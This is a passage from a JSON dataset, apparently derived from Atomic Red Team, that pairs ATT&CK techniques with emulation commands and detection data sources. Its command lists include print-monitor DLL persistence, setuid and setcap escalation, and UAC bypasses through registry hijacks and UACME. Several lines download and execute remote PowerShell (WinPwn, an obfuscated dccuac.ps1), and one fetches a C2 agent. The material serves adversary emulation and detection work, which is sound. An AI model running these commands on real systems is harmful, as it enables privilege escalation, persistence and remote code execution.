arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL.", + "type": "Path", + "default": "C:\\Path\\AtomicRedTeam.dll" + } + }, + "executor": { + "command": "reg add \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /v \"Atomic Red Team\" /d \"#{monitor_dll}\" /t REG_SZ\n", + "cleanup_command": "reg delete \"hklm\\system\\currentcontrolset\\control\\print\\monitors\\ART\" /f >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api 
functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + 
"source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ] + ] + }, + { + "technique_id": "T1547.011", + "command_list": [], + "commands": [], + "parsed_datasets": [ + { + "attack_technique": "T1547.011", + "display_name": "Boot or Logon Autostart Execution: Plist Modification", + "atomic_tests": [ + { + "name": "Plist Modification", + "auto_generated_guid": "394a538e-09bb-4a4a-95d1-b93cf12682a8", + "description": "Modify MacOS plist file in one of two directories\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. Modify a .plist in\n\n /Library/Preferences\n\n OR\n\n ~/Library/Preferences\n\n2. 
Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)\n", + "name": "manual" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + 
"https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547", + "command_list": [ + "pnputil.exe /add-driver \"C:\\Windows\\INF\\usbstor.inf\"\n" + ], + "commands": [ + { + "command": "pnputil.exe /add-driver \"C:\\Windows\\INF\\usbstor.inf\"\n", + "source": "atomics/T1547/T1547.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547", + "display_name": "Boot or Logon Autostart Execution", + "atomic_tests": [ + { + "name": "Add a driver", + "auto_generated_guid": "cb01b3da-b0e7-4e24-bf6d-de5223526785", + "description": "Install a driver via pnputil.exe lolbin\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "driver_inf": { + "description": "A built-in, already installed windows driver inf", + "type": "Path", + "default": "C:\\Windows\\INF\\usbstor.inf" + } + }, + "executor": { + "command": "pnputil.exe /add-driver \"#{driver_inf}\"\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + 
], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": 
"process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "kernel", + "definition": "Information associated with the operating system kernel of a host.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS" + ], + "data_component": "kernel module load", + "description": "A kernel module was loaded on a host.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "kernel module" + }, + { + "data_source": "driver", + "definition": 
"Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver load", + "description": "A driver (User-mode, kernel-mode) was loaded.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383", + "https://man7.org/linux/man-pages/man2/init_module.2.html" + ], + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ] + ] + }, + { + "technique_id": "T1548.001", + "command_list": [ + "cp PathToAtomicsFolder/T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+s /tmp/evilBinary\n", + "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+s /tmp/evilBinary\n", + "cp PathToAtomicsFolder/T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n" + ], + "commands": [ + { + "command": "cp PathToAtomicsFolder/T1548.001/src/hello.c /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod u+s /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - 
Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "sudo touch /tmp/evilBinary\nsudo chown root /tmp/evilBinary\nsudo chmod g+s /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "cp PathToAtomicsFolder/T1548.001/src/cap.c /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + }, + { + "command": "touch /tmp/evilBinary\nsudo setcap cap_setuid=ep /tmp/evilBinary\n", + "source": "atomics/T1548.001/T1548.001.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Setuid and Setgid" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.001", + "display_name": "Abuse Elevation Control Mechanism: Setuid and Setgid", + "atomic_tests": [ + { + "name": "Make and modify binary from C source", + "auto_generated_guid": "896dfe97-ae43-4101-8e96-9a7996555d80", + "description": "Make, change owner, and change file attributes on a C source code file\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "payload": { + "description": "hello.c payload", + "type": "Path", + "default": "PathToAtomicsFolder/T1548.001/src/hello.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/hello.c\nsudo chown root /tmp/hello.c\nsudo make /tmp/hello\nsudo chown root /tmp/hello\nsudo chmod u+s /tmp/hello\n/tmp/hello\n", + "cleanup_command": "sudo rm /tmp/hello\nsudo rm /tmp/hello.c\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Set a SetUID flag on file", + "auto_generated_guid": "759055b3-3885-4582-a8ec-c00c9d64dd79", + "description": "This test sets the SetUID flag on a file in Linux and macOS.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_setuid": { + 
"description": "Path of file to set SetUID flag", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "sudo touch #{file_to_setuid}\nsudo chown root #{file_to_setuid}\nsudo chmod u+s #{file_to_setuid}\n", + "cleanup_command": "sudo rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Set a SetGID flag on file", + "auto_generated_guid": "db55f666-7cba-46c6-9fe6-205a05c3242c", + "description": "This test sets the SetGID flag on a file in Linux and macOS.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "input_arguments": { + "file_to_setuid": { + "description": "Path of file to set SetGID flag", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "sudo touch #{file_to_setuid}\nsudo chown root #{file_to_setuid}\nsudo chmod g+s #{file_to_setuid}\n", + "cleanup_command": "sudo rm #{file_to_setuid}\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Make and modify capabilities of a binary", + "auto_generated_guid": "db53959c-207d-4000-9e7a-cd8eb417e072", + "description": "Make and modify [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) of a C source code file.\nThe binary doesn't have to modify the UID, but the binary is given the capability to arbitrarily modify it at any time with `setuid(0)`.\nWithout being owned by root, the binary can set the UID to 0.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "payload": { + "description": "cap.c payload", + "type": "Path", + "default": "PathToAtomicsFolder/T1548.001/src/cap.c" + } + }, + "executor": { + "command": "cp #{payload} /tmp/cap.c\nmake /tmp/cap\nsudo setcap cap_setuid=ep /tmp/cap\n/tmp/cap\n", + "cleanup_command": "rm /tmp/cap\nrm /tmp/cap.c\n", + "name": "sh", + "elevation_required": true + } + }, + { + "name": "Provide the SetUID capability to a file", + "auto_generated_guid": "1ac3272f-9bcf-443a-9888-4b1d3de785c1", + 
"description": "This test gives a file the capability to set UID without using flags.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_setcap": { + "description": "Path of file to provide the SetUID capability", + "type": "Path", + "default": "/tmp/evilBinary" + } + }, + "executor": { + "command": "touch #{file_to_setcap}\nsudo setcap cap_setuid=ep #{file_to_setcap}\n", + "cleanup_command": "rm #{file_to_setcap}\n", + "name": "sh", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file stream" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file metadata", + "description": "Data and information that describe a file and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1548.002", + "command_list": [ + "reg.exe add hkcu\\software\\classes\\mscfile\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\ncmd.exe /c eventvwr.msc\n", + "New-Item \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\mscfile\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\eventvwr.msc\"\n", + "reg.exe add 
hkcu\\software\\classes\\ms-settings\\shell\\open\\command /ve /d \"C:\\Windows\\System32\\cmd.exe\" /f\nreg.exe add hkcu\\software\\classes\\ms-settings\\shell\\open\\command /v \"DelegateExecute\" /f\nfodhelper.exe\n", + "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\fodhelper.exe\"\n", + "New-Item \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Force\nNew-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"DelegateExecute\" -Value \"\" -Force\nSet-ItemProperty \"HKCU:\\software\\classes\\ms-settings\\shell\\open\\command\" -Name \"(default)\" -Value \"C:\\Windows\\System32\\cmd.exe\" -Force\nStart-Process \"C:\\Windows\\System32\\ComputerDefaults.exe\"\n", + "mkdir \"\\\\?\\C:\\Windows \\System32\\\"\ncopy \"C:\\Windows\\System32\\cmd.exe\" \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\nmklink c:\\testbypass.exe \"\\\\?\\C:\\Windows \\System32\\mmc.exe\"\n", + "New-Item -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Value 'cmd.exe /c notepad.exe'\nNew-ItemProperty -Force -Path \"HKCU:\\Software\\Classes\\Folder\\shell\\open\\command\" -Name \"DelegateExecute\"\nStart-Process -FilePath $env:windir\\system32\\sdclt.exe\nStart-Sleep -s 3\n", + "reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\n", + "PathToAtomicsFolder\\T1548.002\\src\\T1548.002.bat\n", + "\"%temp%\\uacme\\23 Akagi64.exe\"\n", + "\"%temp%\\uacme\\31 Akagi64.exe\"\n", + "\"%temp%\\uacme\\33 Akagi64.exe\"\n", + "\"%temp%\\uacme\\34 Akagi64.exe\"\n", + "\"%temp%\\uacme\\39 Akagi64.exe\"\n", + "\"%temp%\\uacme\\56 
Akagi64.exe\"\n", + "\"%temp%\\uacme\\59 Akagi64.exe\"\n", + "\"%temp%\\uacme\\61 Akagi64.exe\"\n", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n", + ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command 
